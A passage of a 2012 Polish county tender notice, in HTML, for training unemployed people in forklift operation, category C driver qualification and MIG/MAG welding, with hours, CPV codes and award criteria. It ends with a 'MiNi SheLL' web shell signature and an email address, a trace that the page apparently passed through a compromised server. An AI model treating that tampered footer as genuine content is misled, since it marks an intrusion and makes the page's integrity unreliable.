- drezdeneckiego. Celem kursu jest nabycie umiejętności i uprawnień z zakresu obsługi wózka widłowego potwierdzonych odpowiednim dokumentem . Miejsce realizacji szkolenia: powiat strzelecko - drezdenecki, powiaty ościenne lub miasto Gorzów Wlkp. Liczba godzin szkolenia 67, 
w tym: 48 godzin: zajęcia teoretyczne, 19 godzin: zajęcia praktyczne (czas trwania egzaminu nie jest wliczany w czas trwania szkolenia). Zajęcia odbywać się będą od poniedziałku do piątku z wyłączeniem świąt, w godzinach 8.00  - 17.00, przeciętnie nie mniej niż 25 godzin zegarowych w tygodniu, maksymalnie 8 godzin dziennie. Godzina zegarowa = 45 minut zajęć + 15 minut.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Kwalifikacja wstępna przyśpieszona kat. C.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie i organizacja szkolenia grupowego pn. Kwalifikacja wstępna przyśpieszona kat. C dla 8 osób bezrobotnych lub poszukujących pracy finansowanego ze środków Funduszu Pracy. Uczestnikami szkolenia będą osoby bezrobotne lub poszukujące pracy, którym wydano prawo jazdy kat. C po 10 września 2009r., zamieszkujące teren powiatu strzelecko-drezdeneckiego. Szkolenie musi być realizowane według planu nauczania obejmującego przeciętnie nie mniej niż 25 godzin zegarowych w tygodniu, maksymalnie 8 godzin dziennie. Wymagane jest, aby zajęcia odbywały się w godzinach między 8.00 a 17.00, codziennie od poniedziałku do piątku z wyłączeniem świąt. Miejsce realizacji szkolenia: dopuszcza się realizację części szkolenia poza powiatem strzelecko-drezdeneckim tylko w sytuacjach uzasadnionych programem. Najpóźniej w dniu rozpoczęcia szkolenia Wykonawca przekazuje Zamawiającemu pełny harmonogram zajęć. Program szkolenia powinien obejmować 140 godzin szkolenia: 130 godzin - zajęcia teoretyczne, 10 godzin - zajęcia praktyczne (czas trwania egzaminu nie jest wliczany w czas trwania szkolenia). Godzina szkolenia (45 minut zajęcia edukacyjne + przerwa licząca średnio 15 minut, długość przerw może być ustalana w sposób elastyczny). Celem szkolenia jest nabycie wiedzy i  umiejętności niezbędnych do uzyskania odpowiednich uprawnień i podjęcia zatrudnienia na stanowisku kierowcy samochodu ciężarowego. Program szkolenia musi być opracowany zgodnie z przepisami prawa, m.in. Rozporządzenia Ministra Infrastruktury z dnia 02 lipca 2008 r. w sprawie szkolenia kierowców wykonujących przewóz drogowy (Dz. U. z 2008 r. Nr 124, poz. 805 ze zm.), ustawy o transporcie drogowym oraz ustawy - Prawo ruchu drogowego i obejmować: część podstawową (poznanie charakterystyki układu przeniesienia napędu w celu jego optymalnego wykorzystania, poznanie charakterystyki technicznej  i sposobu działania urządzeń służących bezpieczeństwu, w tym zapewnienia panowania nad pojazdem, zminimalizowania jego zużycia i zapobiegania awariom, stosowanie przepisów, poznanie uwarunkowań społecznych dotyczących transportu drogowego i rządzących nim zasad, bezpieczeństwo, obsługa i logistyka w aspekcie zdrowia, ruchu drogowego i środowiska, uświadomienie kierowcom zagrożenia wypadkami na drodze i w pracy, umiejętność zapobiegania przestępstwom i przemytowi nielegalnych imigrantów, umiejętność zapobiegania zagrożeniom fizycznym, świadomość znaczenia predyspozycji fizycznych i psychicznych, umiejętność oceny sytuacji awaryjnych, w sytuacjach krytycznych, umiejętność zachowania się  w sposób poprawiający wizerunek przewoźnika) oraz część specjalistyczną (szkolenie zaawansowane w racjonalnej jeździe, z uwzględnieniem przepisów bezpieczeństwa, umiejętność optymalizacji zużycia paliwa oraz jazda  w warunkach specjalnych, umiejętność zapewnienia pasażerom komfortu i bezpieczeństwa, umiejętność równomiernego obciążenia pojazdu zgodnie z wymaganymi przepisami bhp i zasadami użytkowania pojazdu, poznanie i stosowanie przepisów, bezpieczeństwo, obsługa i logistyka w aspekcie zdrowia, ruchu drogowego i środowiska). Wykonawca powinien załączyć szczegółową informację dotyczącą miejsca prowadzenia szkolenia (lokalizacja budynku i sal wykładowych). Pomieszczenia do odbywania szkolenia muszą być przystosowane do liczby osób przewidzianych do przeszkolenia i spełniać wymogi BHP. Wykonawca zapewni wszystkim uczestnikom szkolenia na własność materiały szkoleniowe wspomagające tematykę szkolenia oraz materiały do robienia notatek (zeszyt, długopis)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.41.10.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie - 30</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Spawanie metodą MIG (131) i MAG (135).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przeprowadzenie i organizacja szkolenia grupowego pn. Spawanie metodą MIG i  MAG dla 8 osób bezrobotnych lub poszukujących pracy finansowanego ze środków Funduszu Pracy. Uczestnikami szkolenia będą osoby bezrobotne lub poszukujące pracy zamieszkujące teren powiatu strzelecko-drezdeneckiego. Szkolenie musi być realizowane według planu nauczania obejmującego przeciętnie nie mniej niż 25 godzin zegarowych w tygodniu,  maksymalnie 8 godzin dziennie. Wymagane jest, aby zajęcia odbywały się w godzinach między 8.00 a 17.00, codziennie od poniedziałku do piątku z wyłączeniem świąt. Miejsce realizacji szkolenia: teren powiatu strzelecko-drezdeneckiego. Najpóźniej w dniu rozpoczęcia szkolenia Wykonawca przekazuje Zamawiającemu pełny harmonogram zajęć. Program szkolenia powinien obejmować 200 godzin szkolenia (czas trwania egzaminu nie jest wliczany w czas trwania szkolenia). Godzina szkolenia - godzina zegarowa = 60 minut (45 minut zajęcia edukacyjne + przerwa licząca średnio   15 minut, długość przerw może być ustalana w sposób elastyczny). Celem szkolenia jest przygotowanie teoretyczne i praktyczne uczestników do egzaminu końcowego, otrzymania certyfikatu zgodnego                   z wytycznymi Instytutu Spawalnictwa w Gliwicach oraz podjęcie zatrudnienia na stanowisku spawacza zgodnie z nabytymi umiejętnościami. Program szkolenia musi być opracowany zgodnie z wytycznymi Instytutu Spawalnictwa w Gliwicach i obejmować m.in.: procesy spawania, rysunek techniczny 
w spawalnictwie, techniki i technologia spawania, urządzenia i sprzęt do spawania, konstrukcje spawania. Wykonawca powinien załączyć szczegółową informację dotyczącą miejsca prowadzenia szkolenia (lokalizacja budynku i sal wykładowych). Pomieszczenia do odbywania szkolenia muszą być przystosowane do liczby osób przewidzianych do przeszkolenia i spełniać wymogi BHP. Wykonawca zapewni wszystkim uczestnikom szkolenia na własność materiały szkoleniowe wspomagające tematykę szkolenia oraz materiały do robienia notatek (zeszyt, długopis)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 70</li>
<li>2. Doświadczenie - 30</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com